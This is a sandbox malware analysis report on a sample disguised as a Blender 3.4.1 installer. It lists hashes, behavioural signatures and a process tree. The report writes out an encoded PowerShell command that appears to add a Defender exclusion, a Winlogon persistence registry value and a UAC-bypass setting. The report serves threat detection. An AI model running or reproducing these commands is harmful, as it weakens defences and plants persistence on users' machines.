Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
298s -
max time network
315s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
02/02/2023, 10:14
Static task
static1
Behavioral task
behavioral1
Sample
blender-3.4.1-windows-x64.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
blender-3.4.1-windows-x64.exe
Resource
win10v2004-20220812-en
General
-
Target
blender-3.4.1-windows-x64.exe
-
Size
683.8MB
-
MD5
aedf8960317a0effcd89c5d816137067
-
SHA1
4e074a8e180a9d3248f5fceadf28ea4f7146b33e
-
SHA256
eeaaa0e20ba43f13e0b62862979abe7f50bb558a812fc4aa729e946fdbe54e98
-
SHA512
f1e7d861e01ebcc69cad9cceee712885ef1739a84923787bfe7d9e5e9e108b2721b2a1e916e4a33fa947ac84ed6010c1d32fdf0091b3a9ca7f34738a6be6981a
-
SSDEEP
3072:mcqqdOyJocZB0O7i4Cg3DILI48p8ERDuwBbEUA:T/dOyJovrg3/ppDuwBYU
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Tqhtsdgnsm\\Vcelkcpar.exe\"," blender-3.4.1-windows-x64.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" InstallUtil.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation blender-3.4.1-windows-x64.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 39 eth0.me -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 5060 set thread context of 456 5060 blender-3.4.1-windows-x64.exe 89 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3536 powershell.exe 3536 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 5060 blender-3.4.1-windows-x64.exe Token: SeDebugPrivilege 3536 powershell.exe Token: SeDebugPrivilege 456 InstallUtil.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 5060 wrote to memory of 3884 5060 blender-3.4.1-windows-x64.exe 86 PID 5060 wrote to memory of 3884 5060 blender-3.4.1-windows-x64.exe 86 PID 5060 wrote to memory of 3884 5060 blender-3.4.1-windows-x64.exe 86 PID 3884 wrote to memory of 3536 3884 cmd.exe 88 PID 3884 wrote to memory of 3536 3884 cmd.exe 88 PID 3884 wrote to memory of 3536 3884 cmd.exe 88 PID 5060 wrote to memory of 456 5060 blender-3.4.1-windows-x64.exe 89 PID 5060 wrote to memory of 456 5060 blender-3.4.1-windows-x64.exe 89 PID 5060 wrote to memory of 456 5060 blender-3.4.1-windows-x64.exe 89 PID 5060 wrote to memory of 456 5060 blender-3.4.1-windows-x64.exe 89 PID 5060 wrote to memory of 456 5060 blender-3.4.1-windows-x64.exe 89 PID 5060 wrote to memory of 456 5060 blender-3.4.1-windows-x64.exe 89 PID 5060 wrote to memory of 456 5060 blender-3.4.1-windows-x64.exe 89 PID 5060 wrote to memory of 456 5060 blender-3.4.1-windows-x64.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\blender-3.4.1-windows-x64.exe"C:\Users\Admin\AppData\Local\Temp\blender-3.4.1-windows-x64.exe"1⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5060 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==2⤵
- Suspicious use of WriteProcessMemory
PID:3884 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3536
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe2⤵
- UAC bypass
- Suspicious use of AdjustPrivilegeToken
PID:456
-